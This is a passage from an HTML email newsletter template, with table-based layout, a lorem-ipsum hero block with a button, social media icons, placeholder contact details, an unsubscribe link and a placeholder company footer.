							<table  class="devicewidth" align="center" cellspacing="0" cellpadding="0" border="0" width="640"  style="margin:0 auto;">
								<tr>
									<td width="640" align="center" background="images/absolute2bg.jpg" valign="top" height="450" style="margin:0 auto;background-position: center center;background-repeat:no-repeat;">
									 <!--[if gte mso 9]>
  <v:rect xmlns:v="urn:schemas-microsoft-com:vml" fill="true" stroke="false" style="width:640px;height:450px;">
    <v:fill type="tile" src="images/absolute2bg.jpg" color="#737987" />
    <v:textbox inset="0,0,0,0">
  <![endif]-->
  <div>
										<table  class="devicewidth" align="center" cellspacing="0" cellpadding="0" border="0" width="640"  style="margin:0 auto;">
											<tr>
												<td width="640" align="center" height="104">&nbsp;</td>
											</tr>
											<tr>
												<td>
													<table class="devicewidthinner" align="center" border="0" cellpadding="0" cellspacing="0" width="580">
														<tr>
															<td width="640">
																<table class="devicewidthinner" bgcolor="#fe6e6d" align="right" border="0" cellpadding="0" cellspacing="0" width="290">
																	<tr>
																		<td align="left" width="640">
																			<table style="mso-table-lspace:0;mso-table-rspace:0;border-collapse: collapse;" class="devicewidthinner" align="center" border="0" cellpadding="0" cellspacing="0" width="240">
																				<tr>
																					<td width="640" height="26">&nbsp;</td>
																				</tr>
																				<tr>
																					<td width="640" align="left" class="robotofont" style="font-family: Arial, Helvetica, sans-serif,Roboto;font-weight: 300; font-size: 30px;line-height:30px;color:#fff;text-transform: uppercase;">mauris nec male suada fames ac turpis velit.</td>
																				</tr>
																				<tr>
																					<td width="640" height="25">&nbsp;</td>
																				</tr>
																				<tr>
																					<td align="left">
																						 <table style="mso-table-lspace:0;mso-table-rspace:0;border-collapse: collapse;" class="button" bgcolor="#fe6e6d" align="left" border="0" cellpadding="0" cellspacing="0" width="120">
																										<tbody><tr>
																											<td class="osansfont button" align="center" style="color:#2f302f; background:#fe6e6d; height:40px; font-family: Arial,Helvetica,sans-serif,'Open Sans';border: 1px solid #fff; font-size:18px;text-align:center; width:150px" valign="middle" height="40" width="120">
																												<a href="#" style="border:none; color:#ffffff; display:block; font-size:14px; height:40px; line-height:40px; text-decoration:none; vertical-align:middle" target="_blank" title="Read more">Read more</a>
																											</td>
																										</tr>
																										
																									</tbody></table>
																					</td>
																				</tr>
																				<tr>
																					<td width="640" height="25">&nbsp;</td>
																				</tr>
																			</table>
																		</td>
																	</tr>
																</table>
															</td>
														</tr>
													</table>
												</td>
											</tr>
											<tr>
												<td width="640" align="center" height="109">&nbsp;</td>
											</tr>
										</table>
										</div>
							<!--[if gte mso 9]>
    </v:textbox>
  </v:rect>
  <![endif]-->
									</td>
								</tr>
								
							</table>
							
						</td>
					</tr>
				</table>
				
				<!-- socials -->
				
				<table class="tablereset" align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
					<tr>
						<td width="640">
							<table class="devicewidth" align="center" bgcolor="#ffffff" border="0" cellpadding="0" cellspacing="0" width="640">
								<tr>
									<td align="center" style="font-size:1px; line-height:1px" height="27" width="640">&nbsp;</td>
								</tr>
								<tr>
									<td class="robotofont" align="center" style="color:#fe6e6d; font-family:Arial, Helvetica, sans-serif,Roboto; font-size:30px; line-height:1em; text-transform: uppercase;font-weight:300;">
										Let's stay in touch	
									</td>
								</tr>
								<tr>
									<td align="center" style="font-size:1px; line-height:1px" height="23" width="640">&nbsp;</td>
								</tr>
								<tr>
									<td width="640" align="center">
										<table class="devicewidthinner" align="center" border="0" cellpadding="0" cellspacing="0" width="136">
                                                        <tr>
															<td width="640">
																<table class="" align="center" border="0" cellpadding="0" cellspacing="0" width="136">
																	<tr>
																		<td align="center" valign="middle" style="color:#7d7372; font-family:Arial, Helvetica, sans-serif; font-size:10px" width="30%">
																			<a href="#" target="_blank" title="" style="border:none; color:#222222">
																				<img src="images/twitter.png" alt="" border="0" width="32" height="32" style="border:none; display:block; padding-left:4px; text-decoration:none">
																			</a>
																		</td>
                                                                        <td width="5" style="width:5px"></td>
																		<td align="center" valign="middle" style="color:#7d7372; font-family:Arial, Helvetica, sans-serif; font-size:10px" width="30%">
																			<a href="#" target="_blank" title="" style="border:none; color:#222222">
																				<img src="images/facebook.png" alt="" border="0" width="32" height="32" style="border:none; display:block; padding-left:4px; text-decoration:none">
																			</a>
																		</td>
                                                                        <td width="5" style="width:5px"></td>
																		<td align="center" valign="middle" style="color:#7d7372; font-family:Arial, Helvetica, sans-serif; font-size:10px" width="30%">
																			<a href="#" target="_blank" title="" style="border:none; color:#222222">
																				<img src="images/youtube.png" alt="" border="0" width="32" height="32" style="border:none; display:block; padding-left:4px; text-decoration:none">
																			</a>
																		</td>
																	</tr>
																</table>
															</td>
														</tr>
                                                    </table>
									</td>
								</tr>
								<tr>
									<td align="center" style="font-size:1px; line-height:1px" height="24" width="640">&nbsp;</td>
								</tr>
							</table>
						</td>
					</tr>
				</table>
				
				<!-- contact us -->
				
				<table class="tablereset" align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
					<tr>
						<td width="640">
							<table class="devicewidth" align="center" bgcolor="#fb5779" border="0" cellpadding="0" cellspacing="0" width="640">
								<tr>
									<td align="center" style="font-size:1px; line-height:1px" height="41" width="640">&nbsp;</td>
								</tr>
								<tr>
									<td class="robotofont" align="center" style="color:#ffffff; font-family:Arial, Helvetica, sans-serif,Roboto; font-size:30px; line-height:1em; text-transform: uppercase;font-weight:300;">
										Contact us
									</td>
								</tr>
								<tr>
									<td align="center" style="font-size:1px; line-height:1px" height="28" width="640">&nbsp;</td>
								</tr>
								<tr>
									<td class="robotofont" align="center" style="color:#ffffff; font-family:Arial, Helvetica, sans-serif,Roboto; font-size:24px; line-height:1.4em; text-transform: uppercase;font-weight:300;">
										+44 123 45 67
									</td>
								</tr>
								<tr>
									<td class="robotofont" align="center" style="color:#ffffff; font-family:Arial, Helvetica, sans-serif,Roboto; font-size:24px; line-height:1.4em; text-transform: uppercase;font-weight:300;">
										info@example.com
									</td>
								</tr>
								<tr>
									<td height="30" width="640">&nbsp;</td>
								</tr>
								<tr>
                                    <td class="logo" align="center" style="font-family:Arial, Helvetica, sans-serif;" valign="middle" height="20" width="640">
                                            <img class="ico" src="images/vestes_ico2.png" alt="" border="0" style="color:#000000; border:none; display:block;  font-size:22px; max-height:80px;" height="9" width="16" >
                                    </td>
                                </tr>
								<tr>
									<td height="21" width="640">&nbsp;</td>
								</tr>
							</table>
						</td>
					</tr>
				</table>
				

				<table class="tablereset" align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
					<tr>
						<td width="640">
							<table class="devicewidth" bgcolor="#312736" align="center" border="0" cellpadding="0" cellspacing="0" width="640">
								<tr>
									<td width="640">
										<table class="devicewidthinner" align="center" border="0" cellpadding="0" cellspacing="0" width="590">
											<tr>
												<td width="640" height="21">&nbsp;</td>
											</tr>
											<tr>
												<td align="center" width="640" style="color:#73627c; font-family:Arial, Helvetica, sans-serif; font-size:12px; line-height:1em">
													 We hope you like our newsletters. If you don't, <a href="$$resignlink_href$$" style="font-size:12px;color:#73627c; text-decoration:underline" target="_blank" title="Unsubscribe">simply unsubscribe</a>.
												</td>
											</tr>
										</table>
									</td>
								</tr>
							</table>
						</td>
					</tr>
				</table>
				<table class="tablereset" align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
					<tr>
						<td width="640">
							<table class="devicewidth" bgcolor="#312736" align="center" border="0" cellpadding="0" cellspacing="0" width="640">
								<tr>
									<td align="center" style="font-size:1px; line-height:1px" height="24" width="640">&nbsp;</td>
								</tr>
							</table>
						</td>
					</tr>
				</table>
				<table class="tablereset" align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
					<tr>
						<td width="640">
							<table class="devicewidth" bgcolor="#312736" align="center" border="0" cellpadding="0" cellspacing="0" width="640">
								<tr>
									<td width="640">
										<table class="devicewidthinner" align="center" border="0" cellpadding="0" cellspacing="0" width="590">
											<tr>
												<td align="center" width="640" style="color:#73627c; font-family:Arial, Helvetica, sans-serif; font-size:12px; line-height:18px;">
													Message sent by YourName company: YourCompany LTD United Kingdom at Address, City. 
Phone Number. +44 12 3456 7890, email: support@yourcompany.com, youtcompany.com Registration Number 00000000.
												</td>
											</tr>
										</table>
									</td>
								</tr>
							</table>
						</td>
					</tr>
				</table>
				<table class="tablereset" align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
					<tr>
						<td width="640">
							<table class="devicewidth" bgcolor="#312736" align="center" cellspacing="0" cellpadding="0" border="0" width="640">
								<tr>
									<td align="center" style="font-size:1px; line-height:1px" height="32" width="640">&nbsp;</td>
								</tr>
							</table>
						</td>
					</tr>
				</table>
			</td>
		</tr>
	</table>
</div>
</body>
</html>